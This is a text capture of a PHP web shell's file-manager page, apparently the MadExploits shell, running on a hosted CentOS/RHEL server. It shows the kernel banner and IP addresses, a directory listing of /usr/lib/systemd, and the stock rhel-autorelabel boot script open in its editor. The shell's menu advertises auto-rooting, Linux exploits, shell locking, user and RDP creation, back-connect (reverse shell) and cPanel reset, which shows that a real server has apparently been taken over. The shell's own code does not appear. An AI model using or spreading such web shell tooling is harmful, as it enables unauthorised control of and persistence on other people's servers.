Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.133.152.189
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
catalog
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
import-pubring.gpg
9.33
KB
-rw-r--r--
rhel-autorelabel
2.31
KB
-rwxr-xr-x
rhel-configure
399
B
-rwxr-xr-x
rhel-dmesg
110
B
-rwxr-xr-x
rhel-domainname
158
B
-rwxr-xr-x
rhel-import-state
1.03
KB
-rwxr-xr-x
rhel-loadmodules
233
B
-rwxr-xr-x
rhel-readonly
5.77
KB
-rwxr-xr-x
systemd
1.56
MB
-rwxr-xr-x
systemd-ac-power
23.41
KB
-rwxr-xr-x
systemd-activate
68.52
KB
-rwxr-xr-x
systemd-backlight
73.02
KB
-rwxr-xr-x
systemd-binfmt
60.73
KB
-rwxr-xr-x
systemd-bootchart
125.05
KB
-rwxr-xr-x
systemd-cgroups-agent
35.91
KB
-rwxr-xr-x
systemd-coredump
129.86
KB
-rwxr-xr-x
systemd-cryptsetup
101.28
KB
-rwxr-xr-x
systemd-fsck
331.23
KB
-rwxr-xr-x
systemd-hibernate-resume
39.95
KB
-rwxr-xr-x
systemd-hostnamed
367.16
KB
-rwxr-xr-x
systemd-importd
367.75
KB
-rwxr-xr-x
systemd-initctl
309.84
KB
-rwxr-xr-x
systemd-journald
338.05
KB
-rwxr-xr-x
systemd-localed
375.22
KB
-rwxr-xr-x
systemd-logind
624.84
KB
-rwxr-xr-x
systemd-machine-id-commit
52.19
KB
-rwxr-xr-x
systemd-machined
482.01
KB
-rwxr-xr-x
systemd-modules-load
64.8
KB
-rwxr-xr-x
systemd-pull
183.14
KB
-rwxr-xr-x
systemd-quotacheck
43.96
KB
-rwxr-xr-x
systemd-random-seed
48.13
KB
-rwxr-xr-x
systemd-readahead
97.51
KB
-rwxr-xr-x
systemd-remount-fs
56.52
KB
-rwxr-xr-x
systemd-reply-password
35.93
KB
-rwxr-xr-x
systemd-rfkill
60.74
KB
-rwxr-xr-x
systemd-shutdown
146.76
KB
-rwxr-xr-x
systemd-shutdownd
64.52
KB
-rwxr-xr-x
systemd-sleep
89.16
KB
-rwxr-xr-x
systemd-socket-proxyd
105.52
KB
-rwxr-xr-x
systemd-sysctl
64.83
KB
-rwxr-xr-x
systemd-sysv-install
40.22
KB
-rwxr-xr-x
systemd-timedated
375.91
KB
-rwxr-xr-x
systemd-udevd
406.45
KB
-rwxr-xr-x
systemd-update-done
44.07
KB
-rwxr-xr-x
systemd-update-utmp
309.87
KB
-rwxr-xr-x
systemd-user-sessions
44.16
KB
-rwxr-xr-x
systemd-vconsole-setup
52.2
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rhel-autorelabel
#!/bin/bash # # Do automatic relabelling # . /etc/init.d/functions # If the user has this (or similar) UEFI boot order: # # Windows | grub | Linux # # And decides to boot into grub/Linux, then the reboot at the end of autorelabel # would cause the system to boot into Windows again, if the autorelabel was run. # # This function restores the UEFI boot order, so the user will boot into the # previously set (and expected) partition. efi_set_boot_next() { # NOTE: The [ -x /usr/sbin/efibootmgr ] test is not sufficent -- it could # succeed even on system which is not EFI-enabled... if ! efibootmgr > /dev/null 2>&1; then return fi # NOTE: It it possible that some other services might be setting the # 'BootNext' item for any reasons, and we shouldn't override it if so. if ! efibootmgr | grep --quiet -e 'BootNext'; then CURRENT_BOOT="$(efibootmgr | grep -e 'BootCurrent' | sed -re 's/(^.+:[[:space:]]*)([[:xdigit:]]+)/\2/')" efibootmgr -n "${CURRENT_BOOT}" > /dev/null 2>&1 fi } relabel_selinux() { # if /sbin/init is not labeled correctly this process is running in the # wrong context, so a reboot will be required after relabel AUTORELABEL= . /etc/selinux/config echo "0" > /sys/fs/selinux/enforce [ -x /bin/plymouth ] && plymouth --hide-splash if [ "$AUTORELABEL" = "0" ]; then echo echo $"*** Warning -- SELinux ${SELINUXTYPE} policy relabel is required. " echo $"*** /etc/selinux/config indicates you want to manually fix labeling" echo $"*** problems. Dropping you to a shell; the system will reboot" echo $"*** when you leave the shell." sulogin else echo echo $"*** Warning -- SELinux ${SELINUXTYPE} policy relabel is required." echo $"*** Relabeling could take a very long time, depending on file" echo $"*** system size and speed of hard drives." FORCE=`cat /.autorelabel` [ -x "/usr/sbin/quotaoff" ] && /usr/sbin/quotaoff -aug /sbin/fixfiles $FORCE restore > /dev/null 2>&1 fi rm -f /.autorelabel /usr/lib/dracut/dracut-initramfs-restore efi_set_boot_next sync systemctl --force reboot } # Check to see if a full relabel is needed if [ "$READONLY" != "yes" ]; then restorecon $(awk '!/^#/ && $4 !~ /noauto/ && $2 ~ /^\// { print $2 }' /etc/fstab) >/dev/null 2>&1 relabel_selinux fi
Close